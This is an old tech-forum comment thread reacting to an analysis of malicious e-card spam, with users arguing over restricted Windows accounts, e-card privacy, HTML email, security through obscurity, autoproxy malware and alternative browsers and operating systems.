Nothing beats a real card, but while I can't remember most of the real cards I've got (though I've got em in a drawer somewhere) I sure can remember a lot of the e-cards, particularly those sent by friends when I was feeling down or something. Gotta love the internet! =)

Replace the software or replace the vendor.

[gfecyk]

CD burners: Roxio EasyCD Creator 5 and later work as regular users.

Scanners: I know HP doesn't support some older scanners under Win2K. Later HP ones, especially USB based ones, work fine as a regular user. The combo printer/scanners I've seen work fine as a regular user.

Programs that require Admin: That's why we have competition. I've massaged some badly behaving apps into working as a regular user - it's not hard to loosen up the minimums an app "needs". It's even easier to go to their competition (Quickbooks vs Simply Accounting: One works as a regular user, one requires "power user." Which one did I recommend?)

As for the plain "zipped-idiot.exe" e-mail? That's what Outlook 2000 and later are for: "Outlook has blocked access to the following attachments: this-is-a-bomb.exe/scr/bat/com/etc"

Re:Replace the software or replace the vendor.

[Silburn_Luke]

Programs that require Admin: That's why we have competition. I've massaged some badly behaving apps into working as a regular user - it's not hard to loosen up the minimums an app "needs".

I've run into this with some netgear Wifi kit recently, the scanning client seems to assume Admin privileges for correct function under WinXP.

I'm not actively chasing this down at present because I've got a bunch of other techie chores to do at home before I go back to getting WiFi to work (including mothballing the XP install in favour of Linux so it might be a moot point). Needless to say I will *not* be happy with WiFi s/ware that won't run under (in XP parlance) a restricted user. We shall see.

Regards Luke

Re:Replace the software or replace the vendor.

If you've going to have to replace most of your application software and half your peripherals to run as a regular user, wouldn't it be easier to just replace your operating system? At least that way you get to keep your peripherals.

Re:Replace the software or replace the vendor.

Because then you'd keep Microsoft apologists like him out of work.

Re:Replace the software or replace the vendor.

[rogabean]

start quote: "As for the plain "zipped-idiot.exe" e-mail? That's what Outlook 2000 and later are for: "Outlook has blocked access to the following attachments: this-is-a-bomb.exe/scr/bat/com/etc" :end quote

I hate to say it, but that feature doesn't cut it to stopping that. Sure by default OE 2000 and later block access to attachments, but most end users simply turn access to it back on.

You would not believe how many users a day call me asking why everytime they try and open the attachment their friends/coworkers/family send them it gives them this message and I end up having to tell em how to turn off the blocking feature.
(work for a broadband ISP)

So I hate to say it, but most home end users will still open up "zipped-idiot-run-this-file-and-give-me-my-backdoo r-to-your-system.exe"

Launching Files

[ticklemeozmo]

Actually, at one in time (DotCom boom maybe?, remember "Active Desktop", the whole point of "portals") the browser was SUPPOSED to do anything and everything. Your browser was supposed to be your desktop and that's how you'd do stuff.

That was the point of a "home page", you could get your news and start up Word all on the same page.

Re:Launching Files

[zero_offset]

Yeah, Netscape and Sun both jumped on that bandwagon for a short time.
(Shhh! They're not The Great Satan!)

Virus vs. Spam

[the+grace+of+R'hllor]

Because Viruses can do better with some effort.

MSBlaster is still going around. My own average from installing a base WinXP (and forgetting the Blaster fix and other updates) is about two minutes to being infected with the Blaster worm. A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!

E-mail just can't beat those times.

Re:Virus vs. Spam

[ameoba]

Worms are not viruses, nor are they 'worm-viruses'. They are worms. We have different names for these things 'cuz they are different.

Re:Virus vs. Spam

[the+grace+of+R'hllor]

Worms are just a delivery platform, just as E-mailed screensavers can be.

E-cards are EVIL

[rqqrtnb]

Why do people still insist on using e-cards?

They are spam harvesters. Nothing more.

I go to great lengths to avoid having my email reach spammer lists. But it only takes one person to screw that email address by submitting it to an e-card spammer.

Do I need to attach a note to my emails?

If you are thinking of sending me an e-card:

• I will be changing my email address address again, much to the chagrin of everyone else.

• Since you have have proved incapable of not providing spammers with my personal email address, you will NOT be receiving the new one.

• You are now limited to traditional (non 21st Century) forms of communication with me.

What possesses people to do it?

Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? Maybe they actually hate me...

Bastards.

Re:E-cards are EVIL

[cybergrue]

Why do people still insist on using e-cards?
What possesses people to do it?
Because they think that it is exactly the same as sending you a physical card, just updated for the 21 centry. They have absolutly no idea that there can be a down-side to these things because they are thinking of it in terms of a physical card. They are probably thinking that since you use a computer a lot, then you will like to see a greeting card on your computer. I know, I have a lot of relatives that have done this in the past, and it took a lot of explaning to them why this was a really bad idea.

Re:E-cards are EVIL

What's your email address?

Just say NO to [prescription] drugs!!!

[Thud457]

Goddamn bitch whacked out on Zoloft robbed the world of Troy McClure and the incomparable Lionel Hutz.

the sky is falling!

[Carty]

"which is a rather clear analysis of a piece of malicious spam"

I appreciate his effort but I don't see what's particularly clear about:

'I don't have a windows machine, and don't particularly want to run this and the other executable on one. If someone wants to investigate, feel free.'

One thing that *is* clear is that Windows machines that have installed the most recent patches from MS are not vulnerable. It is really necessary to abandon IE?

I am no MS apologist but I did not learn anything meaningful from this ...

Suggest an alternative browser whenever possible

[ktulu1115]

Well, I'm known (to pretty much all that know me) as the computer dude... Either as the weird Linux nerd, the odd-geek who loves assembly, or just the usual gamer. Having such a reputation automatically makes the non-technically savvy expect me to fix their computers for them, and I've been doing so for many years. This is a perfect opportunity (I'd recommend the same to anyone else in my situation)

After some consideration, I think I'm going to be installing Firefox on everyone's PC's from now on (with their approval of course). A simple blurb about how insecure IE is, the ease of virus-catching (almost sounds like IE has HIV, doesnt it?), and a few key-points from IE's past and I think most of the "normal" PC users will be a quick convert. The fact it doesn't crash (least not for me) will do nothing but help as well - most of them bitch about that too. :-d

My spam with full header database

[leoaugust]

.
I have been putting my spam with full headers here, and hope that people investigating can use the info in the headers like IP addresses, gateways, aliases etc. As it is cached in Google so the results should show up for specific keywords.

If you are spam hunters, please be my guest and fry some spammers a***

.

Oh boy...

[mog007]

I've got a /. rss feed through a Trillian plug-in, and my window was sized just right to make the title of the article:
"Malicious E-Cards" - An anal...

I thought goatse was coming back... in the form of email.

*Shudder*

But why shouldn't they just work?

[physicsnerd]

But why shouldn't people expect there computers to just work? You expect your car to just work and it's on the same level of complexity that a computer is. People who have been running PCs for a few years are so used to windows and the insecurities that running windows brings that they don't expect their computers to just work.

Not everyone is an expert at being a sys admin nor should they have to be. Going back to the car analogy, we don't expect everyone who drives to be a mechanic. We need to stop just accepting that windows sucks and demand that Microsoft start dealing with these issues or switch to something that actually works. Let's face it, 90% of the population doesn't need windows.

I ran windows for a long time. Started on x86 hardware using MS-DOS 3.something. I finally gave up after windows XP came out. Each version of windows is just slower and more bloated then the last. I tried linux for a couple of months, but it just wasn't my cup of tea for my desktop. But even linux just works. Once it was up and running I never had any issues with it.

Last year I sat down in front of an OSX box. A week or so later I bought my first Mac ever, a powerbook. This is by far the best computer that I've ever owned. I've had it for just over a year now and I haven't had a single problem with it. The only thing I did was upgrade it to 10.3 from 10.2 and that went perfectly. I have never had to deal with malicious email. Every new virus that goes around I don't catch. I don't have any driver problems. Everything on my computer just works.

To sum up this rant, if we can't expect windows to just work then why in the hell should we use it?

Re:But why shouldn't they just work?

[Zeriel]

Your car analogy is flawed--the average driver has to go through a minimum of a driver's ed. course in high school, pass a written test, practice with an experienced driver for a length of time (varies by state), take a test from a state employee, and be licensed.

THEN we still don't trust them for a while (higher insurance rates ages 16-25, higher insurance rates until you have three accident-free years with a car (at least from my company)).

Using a computer requires you to sit down and turn it on. No licenses, no training, no tests. I no more expect Joe Average to be able to use a computer error-free than I'd expect a completely untrained 16-yr-old to drive well.

Re:But why shouldn't they just work?

[jnicholson]

Your car analogy is flawed--the average driver has to go through a minimum of a driver's ed. course in high school, pass a written test, practice with an experienced driver for a length of time (varies by state), take a test from a state employee, and be licensed.

You forgot taking it to a mechanic every 6-12 months to have an overhaul. And simply changing the oil from time to time.
And I would argue that a car is a more simple device than a computer, if only because it has a specific task and is not general-purpose.

Not everyone is an artist or a writer

[pixelfreak]

"Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? "

Not everyone is an artist or a writer, which is why traditional cards exist. Unfortunatelly, most E-Cards are crap.

The only E-Cards I use are from Hallmark and Apple. They seem to limit the amount of crap they send me in return for the content and bandwidth required to provide the service.

Security through obscurity DOES work

[Kombat]

Security through obscurity never works

Hogwash. There are plenty of examples where "Security through obscurity" works just fine. Take, for example, Timothy McVeigh's execution. It took place in Indiana, but due to the large number of victims' families who wished to view the execution in Oklahoma, and who couldn't travel, the execution was broadcast via a closed-circuit satellite link to a gymnasium in Oklahoma. There was an extremely strong demand for the general public to tap into that feed. Hackers everywhere could have made an enormous name for themselves if they'd been able to intercept and decrypt that signal. But, since neither the specifics of the transmission of the signal, nor the encryption method used were ever made public, no one captured the signal, and a search for "Timothy McVeigh Execution" on Kazzaa returns 0 results. Security through obscurity worked in this example.

Here's another example. Do you have any idea about the internal layout of the Pentagon? Of course not. The floor plans are top secret. The locations of secret escape hallways are all top secret. The knowledge is "obscured." And consequently, the Pentagon has never been physically broken into. If all you naive "openness is more secure" zealots had your way, then the entire schematic of the Pentagon, Whitehouse, NORAD, and everything else would be all over the net, for us "White hats" to scrutinize and improve. Unfortunately, we'd all argue over what the "right" way to do things would be, and meanwhile, bin Laden's disciples would be delivering suicide-bomb-after-suicide-bomb to Bush's bedside.

I admit that "Security through obscurity" is not a silver bullet, and in many cases, is less desirable than open approaches. However, it is obvious that neither is your suggestion that open solutions are always best, correct. It should be clear to even the most fervent zealot that sometimes, a layer of obscurity is appropriate, and enhances the security of a situation that has already been thoroughly scrutinized by a variety of experts.

Re:Security through obscurity DOES work

[kisrael]

Just to totally miss your point...
This is what I wrote re: the McVeigh excecution:

Salon article: Judge rules no webcast of McVeigh's execution. Now I'm against the death penalty. But if you're going to go for it, you should really go for it. Don't try to pretend there's some kind of dignity here. Go full tilt for the bread and circuses. If the people demand revenge in cold blood, give it to them! In full color! And Dolby Stereo! On national tv! Really get that "deterence" message out there!

Re:Security through obscurity DOES work

[Sgt+York]

Well, security through obscurity works, but only when the obscurity is at or very near 100%. In the Pentagon, no one is allowed to see the layout, and only certain people are allowed to interact with any part of it. The McVeigh execution was the same way, no one got to see any details of it. IIRC, the exact time/date wasn't even announced until the last minute.

However, in software you can't have that near 100% obscurity because large numbers of people have to use the software. Take the Pentagon example. If it was necessary for a very large number of people to have somewhat limited access to the building on a continual basis, the security would eventually break down. The floor plan would eventually be at least partially elucidated and this could allow further security breaches, leading to the discovery of more of the floor plan, etc.

The whole point of making software (like this) is so that lots of people will use it routinely. This high volume, routine use does eventually lead to a breach in the security of the software.

I agree that the flat, absolute statement "security through obscurity never works" is incorrect. However, that pure obscurity is exceptionally rare, alomst to the point of nonexsistence in the software world.

Re:Security through obscurity DOES work

[jfengel]

I didn't mean to imply that open-source is any sort of silver bullet, or even that it's better. My preferences actually run towards redesigning programming languages for additional security. I trust Firebird not because it's open source but because it's more recent, and because I simply find it more pleasant to use than IE.

You are right that securty through obscurity can work. And it can work for a long time. I'm sure the office network I run is terribly vulnerable, but nobody's ever made a concerted effort because there's nothing valuable here. Worse, the software that I write is terribly vulnerable, but it would cost four times as much to make it less vulnerable. It's never been attacked, not because it's hard to get in but simply because you've never heard of it.

But security-through-obscurity won't withstand a long-term concerted attack. The McVeigh execution was a one-time event. If they had broadcasts of every execution, I'm sure they would find a way if obscurity were their only mechanism.

And I _do_ know the layout of many parts of the Pentagon. I've worked there, and so have tens of thousands of other people. The detailed layout isn't considered a secret, exactly; at least, nobody told me that it was.

Re:Security through obscurity DOES work

Do you have any idea about the internal layout of the Pentagon? Of course not. The floor plans are top secret. The locations of secret escape hallways are all top secret. The knowledge is "obscured." And consequently, the Pentagon has never been physically broken into.

If the Pentagon has ever been physically broken into, I doubt it would be public knowledge.

But for the sake of discussion, let's assume it hasn't. I suspect that would have more to do with the company-or-so of armed guards policing the facility, along with (I would guess) badge and biometric access points.

On the other hand, one could argue that the facility was "broken into" on September 11th. And the 'zealots' responsible didn't exactly need floor plans.

Re:Security through obscurity DOES work

Clearly you've never delt with serious crackers. Not everyone out there is a script kiddie.

The original poster was correct: security through obsscurity never works. Perhaps he should've added "against a determined attack".

Re:Security through obscurity DOES work

[Spoing]

1. 1. Security through obscurity never works

   Hogwash.

There is a difference between secrets and security through obscurity.

Example: Passwords are secrets. The mechanism to validate those passwords should never be muddled in obscurity since that leads to back doors and other problems.

Now, adding obscurity to the mix on top of verifiable and unobscured methods is not a bad idea. The "security through obscurity" gripe is really against "security through obscure methods only or trusting someone else's assurance that they are doing the right thing".

Shortening it to "security through obscurity does not work" is short hand.

Re:Security through obscurity DOES work

[Spoing]

1. I'm sure the office network I run is terribly vulnerable, but nobody's ever made a concerted effort because there's nothing valuable here.

Just because it's not 'valuable' doesn't mean it isn't a target. Computing resources alone have value, as does simple voyerism. That doesn't even approach intentional abuses of the accounting records. As a rule, assume everything is a target even if there is no obvious reason why it would be.

Re:Security through obscurity DOES work

[jfengel]

Sure it could be a target. Obscurity is what keeps it from being a target. Now that I've talked about it on Slashdot I'm probably going to be hosed. /quickly checks web site

Well, not yet.

Re:Security through obscurity DOES work

[Spoing]

1. Sure it could be a target. Obscurity is what keeps it from being a target.

[ horrified ] If it's a web site -- on the Internet or (to a lesser degree an intranet) -- there's no way that obscurity is any bit of protection. Secrets, such as passwords, can be helpful though obscurity itself is wishing nothing goes wrong not insurance against problems.

At a bare minimum, run Nessus or one of the other top-notch scanners from both the intranet and Internet and see what it finds; www.nessus.org

Re:Security through obscurity DOES work

[orkysoft]

Yes, I'm sure the builders of the Pentagon were buried in its basements after their tongues got cut out.

Re:Security through obscurity DOES work

[jfengel]

I've got to learn to write complete answers when I speak on Slashdot.

My website is outsourced. I trust real professionals to keep it safe; I'm not an expert in web site security. I see the attacks in the logs, and I observe that they don't get through. Somebody reading my Slashdot posting and deciding to put me in my place is going to hit my web server, not the office network that I manage.

My office network is behind a firewall, but I'm not a security expert. There are plenty of ways through that firewall, I'm sure, but I keep it locked down pretty tight. (No, I'm not going to be talking about the details on Slashdot.)

It's probably been attacked thousands of times at random, but the firewall keeps it out. Because I haven't been the victim of a DOS attack, I don't even really notice the attacks. I'd sure notice a DOS attack, but since there are literally millions of networks like this one, I'm just one more face in the crowd.

So I don't rely on obscurity solely, but thus far the obscurity has meant I've avoided concerted attacks, which would probably be more effective than the rather desultory ones I've seen so far. My server ignores Code Red; my non-Windows firewall keeps out worms. I do my best, but the best security I personally have had against concerted attack is the fact that nobody really cares.

(Funny that I should end up defending obscurity. I actually started this thread with the blanket statement "obscurity doesn't work.")

Re:Security through obscurity DOES work

[shlashdot]

http://www.dtic.mil/jcs/j6/sponsor/pentroom.htm ok so it's missing the secret tunnels.

Re:Security through obscurity DOES work

[Spoing]

OK. If you have a chance, try out Nessus. The analysis it provides is close to normal English; sentences and paragraphs of warnings with some raw data, not raw data all by itself.

Re:Security through obscurity DOES work

No, but they would be if they discussed the layout publically.

Re:Security through obscurity DOES work

[jfengel]

Will do. Thanks for the suggestion.

Re:Security through obscurity DOES work

[zero_offset]

Take the Pentagon example. If it was necessary for a very large number of people to have somewhat limited access to the building on a continual basis

You've obviously never been there. THOUSANDS of people work there, and hundreds, possibly thousands more visit the building daily on various pieces of business. Once you're inside, there really isn't anything to keep you from wandering around pretty much at will. When I was a kid, I went there with my father all the time.

Of course, that fact probably refutes the grandparent post far better than your statement does...

Re:e-cards

[Brandon30X]

I always send them to myself, to an address that already gets TONS of spam. Then I simply forward the card to whoever, and let them know I sent it to myself to respect their e-mail privacy.

Which brings up a good question. Would anyone be offended or mad at someone who sent you an ecard to an e-mail address you keep clean of spam?

The Complete Solution:

lynx

Re:The Complete Solution:

[cavac]

Yeah, sure. Lynx is secure. Proven by this and this and this pages. NOT!

OR

[diablobynight]

You could just simply not view messages from people you don't know. This would solve the majority of problems. I mean if I don't know you, I don't read mail from you, I mean their are times when I take the chance, but lets face it, how often do random people email your personal account? And if your talking a webmaster or sales account, then yes, turn off html, or have your IT guy set up your securities properly.

Re:OR

[RetroGeek]

You could just simply not view messages from people you don't know.

Otherwise known as a white list.

Yes, these work, but part of the utility of the email system is that you CAN get messages from unknown people. I read your email address at some interesting site (slashdot?) and I want to have a one2one conversation with you. So I send you an email. You don't know me from anyone, yet we can have a discussion about something without the entire world being privy to it.

And this is the real bad effect that SPAM has created. We no longer trust strangers.

Sigh...

Re:OR

[diablobynight]

did you not read, I sometimes do read unknown email, meaning, I personally filter it, I don't use a refuse all unknown white list. And if I saw, the subject said, In response to Slashdot, or something else that I was aware I was posting to, or investigating, then I read it with HTML turned off, but if it's from my buddies I read it with HTMl on, if it's from my mom or any girl for that matter, I turn HTML off. lol know your email sender, and adjust accordingly.

Re:OR

Yes, that works fine until your friend gets an email virus and sends an infected mail to you.

Re:OR

[CreatureComfort]

Unfortunately it's my mom and girlfriend who are the worst about sending me HTML formatted email. I have tried over and over again to explain to them why this is bad, and how lousy their emails sent to me look while I have HTML turned off, but they "Think it looks cute" to have a purple fairy for the background image behind bold pink text.

And obviously if Incredimail's advertising says it's "safe, fun, and cool", and CNet gives it a #1 software, and ZDNet and Tucows both go gaga over it, then it must be great, and it's me that's broken.

Re:OR

[Endive4Ever]

if it's from my mom or any girl for that matter, I turn HTML off.

Not a problem for you often, I take it.

News flash: you won't get cooties from reading email from a 'girl.'

Re:OR

[misleb]

You could just simply not view messages from people you don't know. This would solve the majority of problems. I mean if I don't know you, I don't read mail from you, I mean their are times when I take the chance, but lets face it, how often do random people email your personal account?

I get the occasional email from strangers or people I don't normally communicate with via email. For instance, someone from Usenet or a mailing list might email me. I'd hate to miss any one of those. I think it is reasonable to tell people not to open strange attachments, but it isn't reasonable to suggest that people don't even open an email from a stranger. That is just paranoid and unnecessary with reasonable measures taken. Turning off the stupid HTML "feature," don't open strange attachments, run a Bayseian SPAM filter,and everything should be just fine.

-matthew

Re:OR

[misleb]

did you not read, I sometimes do read unknown email, meaning, I personally filter it, I don't use a refuse all unknown white list. And if I saw, the subject said, In response to Slashdot, or something else that I was aware I was posting to, or investigating, then I read it with HTML turned off, but if it's from my buddies I read it with HTMl on, if it's from my mom or any girl for that matter, I turn HTML off. lol know your email sender, and adjust accordingly.

All that just to avoid getting a virus or malicious HTML? What an awkward way to use email.

Re:OR

[Spoing]

1. And obviously if Incredimail's advertising says it's "safe, fun, and cool", and CNet gives it a #1 software, and ZDNet and Tucows both go gaga over it, then it must be great, and it's me that's broken.

Tell them it looks like *rap on your end -- send them a quoted example that does not render -- and that you never view HTML because of security concerns. Faking addresses is too common now, so it's not them, it's the spammers.

My father used to do the same thing, but after a few reminders he asked how to change it. The next time I visited -- click click -- it was disabled. He hasn't complained since...though he's not in the 'purple fairy background and bold pink text' crowd. Show them how ugly it is, and they might be convinced (OK, not likely, though let them know you don't see what they see).

Re:OR

[RetroGeek]

you won't get cooties from reading email from a 'girl.'

I read this as "you won't get cookies from a girl. Then I though, what email program sets cookies?

Re:OR

[RetroGeek]

did you not read, I sometimes do read unknown email, meaning, I personally filter it

Hmmm, that does not come through in the original msg. Now that you have explained it though.....

Re:OR

[diablobynight]

I love the personal insult that I don't get email from girls, oh yes love god of the ages your of course correct, us nerds never see women.

actually I was just making a point that girls are the worst offenders for sending me emails, with viruses, flash screens, stupid little pop ups, bongo buddies, and other shit.

Re:OR

[diablobynight]

not really, usually with questionable email, I just read it through my webmail which doesn't allow html. and everything else I read through outlook. The majority of my email is from work, or people I trust, the rest of it, some friends of mine, and the ocassional unknown person, I just pop out to webmail.

Re:OR

[diablobynight]

I can't get email viruses through my email, unless they are newer than my email scanner on the server end knows about. I set up the work email server and have it scan all incoming and outgoing mail for viruses, if it finds a virus, it tries to cure and if that is impossible it strips the attachment. No muss no fuss, but these html attacks aren't really viruses and can still get through, but not through my spam guard which stops I'd say about 80% of spam on the server end.

Re:OR

[misleb]

Sorry, but that *is* awkward. Just turn off HTML and/or don't run Outlook and you wont' have to jump through hoops like that. Bottom line is that you shouldn't have to fear opening an email... no matter who it is from. Hell, I don't even have to worry about clicking on attachments. Sometimes I really pitty you Windows/Outlook users.

Yeah, I'm smug. Sue me.

matthew

Re:OR

[Reziac]

There's also the little minor issue that even people on your whitelist can unknowingly send you malicious email.

Realworld example: My sister (who, *if* I used a whitelist, would naturally be on it) added some downloaded toolbar to her browser, which in turn reformatted her email as it was being sent (she never saw the alterations)... and what I got in my mailbox was HTML formatted, with javascript that tried to fetch and install the same spyware toolbar (but was foiled by my braindead mail client).

And other folks on private mailing lists I'm on (which would also be whitelisted) have also unknowingly sent virus attachments. This happened on a mailing list populated by sysadmins, not exactly "regular users who don't know anything".

Crap, now I gotta go find another story to spend my mod points on :)

Re:OR

Yeah if a friend get a virus et if your in his email friend address it will not take a long time to infected your machine ..so the better solution is to take a good anti-virus wich will detected the infected email before you open it.

gauge
sylvia

NO, it's the INTERFACE.

[tentimestwenty]

I agree the users are a big problem, but the technology is horrible too, not just in Windows but all OSes. The Mac is the only system that balances the user's need to accomplish things with the protection to not do something catastrophic. It doesn't do this through tons of "Are you sure..." dialog boxes, or with Orwellian security routines, and not even through add-on programs which check up on viruses and backups.

The Mac simply has a user interface that allows you to do the things you want to do. It sounds simple, but most Mac users don't ever get to the point of confusion where they might do something stupid. The terminal isn't right there on the desktop, it's not even in the Applications folder. It's in a folder called Utilities. The Windows folder is such a generic name, it's a likely candidate to be "cleaned out" by a curious user. On the Mac it's called System which has an obvious connotation that it's important to running your computer. I could go on and on.

The interface of the machine is the easiest way to educate users. Make it intuitive and even a novice is going to play safe.

What's frustrating...

[tkrotchko]

Is that ActiveX components can't be installed; there's no list of what was installed, there's no uninstall... I know there's 3rd party tools to tell you what ActiveX controls were installed, but that's only half the battle.

I've often suspected this kind of stuff is done to purposely hide stuff from users.

Kind of like how the registry is designed to hide things. Its overly complex for what it does, and its easy to hide thing there. I think its that way on purpose. So that 3rd party publishers can active programs (or deactivate them), and you either don't know or can't do anything about it.

Imagine if the registry was a plain old text file. You could back it up easily, and you'd be able to grep for changes easily. But that would defeat 1/2 its purpose, wouldn't it.

What's that old slogan? You reap what you sow..s

Re:What's frustrating...

[msoftsucks]

Actually, this was done by M$ intentionally inorder for them to be able to access your machine. Just take a look at the Media Player 9 EULA. This EULA basically states that M$ has the right to access your machine at any time they feel like it. Get access to any file they want, and if they don't like what they see (DRM) can remotely disable your machine. By upgrading to WMP 9, you have signed away your soul to the devil. This is what ActiveX is only good for.

Probably an autoproxy, not a virus

[philg]

I was analyzing something very similar around October of last year when I worked here. They probably aren't installing a virus, per se -- more like an autoproxy which they will use to send spam or install more malware (e.g., to steal passwords or credit card numbers).

All the vulnerabilities mentioned in the article have been known for quite some time. Liu Die Yu's Unpatched IE vulnerabilities page documents several of these in detail, with exploit examples. (Note that some of the links on Liu Die Yu's site may result in popups, ironically.)

When I took a look at it, the proxy flavor of the month was most commonly referred to as ap216.exe the filename is irrelevant, obviously). A good description of it is here, in the context of its use in a phishing scam.

Note that everything done in this attack will blithely go through most firewalls -- almost all connections are initiated from within the network. Firewalls are an increasingly inadequate means of protecting users from organized and motivated attackers. IMO, any network admin who doesn't run deep-packet inspection firewalls, intrusion prevention, or security-minded filtering application proxies is asking for it.

Sure, someone could write something to quietly delete all the files on your hard drive. I'm sure he'd rather have all the spam your machine can send, or all the money from your bank account.

phil

Re:Probably an autoproxy, not a virus

[diablobynight]

Yes of course, all the money from my bank account. Lord knows I keep my bank number, routing number, and pin number, in a text file on my computer marked Bank Information for hacker to use.txt
Get real.
and to you up there who puts his computer on a school network, without all patches and updates, of course you recieved a virus, that's kind of like me bitching if I walk around with my wallet exposed and my eyes closed in London, and then I bitch if my money gets stolen.
A good virus detection program, a NAT router, a spam catcher behind your email server, and a quick look at the security settings, namely changing most of them to prompt before install, and your pretty good to go. Granted, things still could happen to you, lots of them, but you could slip and fall in the shower. lol. My point being, taking away html from email(making them boring), and lots of other stuff you could do, will just make your computing time less enjoyable all the time as apposed to it being less enjoyable some of the time.

Re:Probably an autoproxy, not a virus

[philg]

"Yes of course, all the money from my bank account. Lord knows I keep my bank number, routing number, and pin number, in a text file on my computer marked Bank Information for hacker to use.txt Get real."

Do you bank online? If you're infected with ap216, someone can remotely install keystroke loggers and other nasties on your computer. Believe it or not, they're not doing this just for fun.

'Course, you seem to take reasonable precautions, so you (probably) wouldn't get infected with ap216. Unless you visited one of the hacked websites mentioned in the lurhq.com article I linked to using an unpatched copy of IE 6. (They weren't just 'HOT BRITNEY PORN!!1' -- one of the infected sites was a small business selling uniforms and supplies to school and organizational sports teams, for instance. It took credit card orders -- no word on whether the hacked version stored the numbers in a file involved named "Bank Information for hacker to use.txt".)

That said, they were probably mostly after machines to send spam from/through, and (with the exception of updating your browser) your precautions list is pretty complete for a user. (It's also a bit of a hassle -- we can only hope MS will figure out that some of their software is easy to use, but hard to use responsibly.)

phil

patching

[Metaldsa]

Isn't it funny how we have people complaining how windows auto-update can download patches automatically into users machines and how this is dangerous but at the same time we blame these windows users for not updating their pcs. So when you have tens of millions of windows pcs would you rather MS update them automatically or not? This is problem a dumb question because I bet the /. crowd is divided on it as a matter of privacy and annoyance.

Re:patching

Laziness breeds automation. Automation breeds laziness. It's this vicious cycle that /.'ers are annoyed at. /Raging against the Machine

Re:patching

[freeweed]

Yeah, it's almost as if Slashdot is composed of individuals, who have differing opinions on things.

Funny, eh?

Re:patching

[zero_offset]

Almost, but not quite...

Bad example: McAfee's broken by design.

[gfecyk]

I once posted here how McAfee's software broke my Win2K installation my messing up a bunch of file types and prompting "Preparing to Install..." every time I tried launching IE. Haven't touched or recommended McAfee's software ever since.

While Norton AV works as a regular user, it obviously can't get to stuff restricted from the regular user.

Aside from that I admit I can't tell you how Norton behaves as a regular user, because clients those networks I've locked down actually don't need AV software on the desktop! A Snapgear firewall catches worms before the fact, Outlook 2K catches executable attachments before the fact, and denying Execute permissions in %temp% and Documents and Settings stops viruses in zip files before the fact. And even if something gets past all that, what harm can the virus do running as a regular user? Take up CPU time until the user logs off?

Heh, the virus would probably crash to Dr Watson because it wasn't designed to run as a regular user. heh heh heh heh

"Run as"

[autechre]

Windows 2000 and up have "run as" functionality, which allow you to run binaries as another user (normally Administrator). Just right-click on it.

I have everyone running as "Power Users" on Win2k desktops, and I'm considering trying to get that down to the lower setting where nothing can be installed.

Re:"Run as"

[0123456]

Cool... I'd never seen that before. Thanks.

Re:"Run as"

[whathappenedtomonday]

won't work with xp home / w2k non-pro AFAIK

Re:"Run as"

[ameoba]

isn't shift-right-click?

Re:"Run as"

[autechre]

Not here; a standard right-click offers the option.

I meant to note before that this is not quite as useful as "su", since it's a bit limited. I don't think you can open up "special" things with "run as", such as control panel items (and unlike some Linux distributions and OS X, it will simply slap you down if you have insufficient priveleges, rather than prompting for the Administrator password). But it's helpful for installing things like Flash plugins without logging out.

Monitoring...reputable...contradiction

[Pac]

The phrase "a reputable Russian monitoring site" only makes sense if you think monitoring is a reputable business. I don't consider doubleclick reputable. I don't think anything in, near or around the advertsing industry can be reputable. But that's just me, move on, nothing to see here.

Check out Qwik-Fix.

[autechre]

Remember Pivx Labs, the folks that used to host the "21 unpatched vulnerabilities in IE" page and has since switched to being a slight MS apologist? They've got a nice product which is (currently) free. What they basically did was to tighten down Windows via things from standard settings to registry tweaks to a degree which most users won't notice. Several of the recently discovered IE vulnerabilities wouldn't have worked, and Blaster wouldn't have worked either under these settings.

After trying it on my workstation for a couple of weeks, I've started deploying it to others. It seems to interfere with Norton Antivirus, though not McAffee (which is what UMBC machines should be using anyway).

I also send out the desktops with Mozilla, Media Player Classic, RealAlternative, etc. If people want IM, I try to recommend GAIM. Open source apps tend to have been "written in a more paranoid age" as another poster put it, and also can't as easily get away with doing dumb crap. I also remove the IE and Outlook shortcuts from the desktop (but leave the IE shortcut in the start menu, because the eternally pending PeopleSoft requires it).

Spy.htm: honey pot potential

[Ktistec+Machine]

Here's a honeypot idea: use the "spy.htm" code to add a machine to the attacker's "spy" log, then wait....

Re:Spy.htm: honey pot potential

[ONOIML8]

Oh, I love stuff like this. Elaborate!

Yes , indeed!

[Viol8]

As a linux user I have to be very careful when I upload windows .exe files just in case they do something nasty like , umm ... use up diskspace
on my drive? Oh , but perhaps the spammer will get me to run a linux binary and I wouldn't have a clue what was going on as I saved the binary to my disk
, opened an xterm , typed in its name and ran it? Yes , he'll have me fooled no doubt about that!

Re:Yes , indeed!

[ONOIML8]

If you've never heard of a Linux or Unix program or script being compromised, you lead a sheltered life. So you review the source from start to finish before you complile and only run binaries from a trusted source...which of course could never be compromised. Great.

And I know that it's impossible to find any flaws in Linux based software that could be taken advantage of by someone of ill intent. But I'm not sure that the malicious coders recognize that as truth.

But as the user bases grows there are more and more users who arent as cautious as you. And, as the user base grows, there will be more of those sick fscks looking to cause you harm.

Re:Yes , indeed!

[Viol8]

Sorry, I'm a bit confused. Please tell me how a mail program that only deals with plain text can be compromised? When you've done that then tell
me how a binary will get run without me knowing it via email. And after that explain why I would be dumb enough to run ANY executable from an unknown source
that had not been suitably verified first and even then why exactly would I run then as root user so they could do some serious harm without testing it in a chroot jail first?

Re:Yes , indeed!

[ONOIML8]

First, you seem to consider yourself an "average user" which, from your comments, I can assure you that you are not. You're more educated, more aware of what goes on with your computer than the average person at the keyboard.

I am not an expert in these things, so I won't bother to try to figure out how they can be done. I do know that much is possible. As an example, when I first left the BBS's and got on the internet I received an email warning me about an email going around that would wipe your hard drive clean if you opened it. I passed it on to my step-father, an engineer for the Navy working on a NASA base. He passed around and I received several replies from Navy, NASA, USGS and Air Force computer experts who told me not to worry because such a thing just wasn't possible. Do you agree with them today? 100 years ago most experts would have told you that landing on the moon was not possible. Nor was breaking the sound barrier. Please don't limit your imagination. I can assure you that the sick fscks out there aren't so limited.

Look beyond things transmitted by email. Every day people find flaws in your favorite operating systems including ways to gain root access and do as they please. And every day someone is fixing that kind of problem. Every day we learn something new which often requires us to change software and change the way we run it to improve security.

You sound very confident that you are secure, that it can't happen to you. I think you have a false sense of security. If you and your system were perfect, totally secure and immune to tampering by someone from the outside....well, you would have solved the problem for everyone. You'll be in high demand.

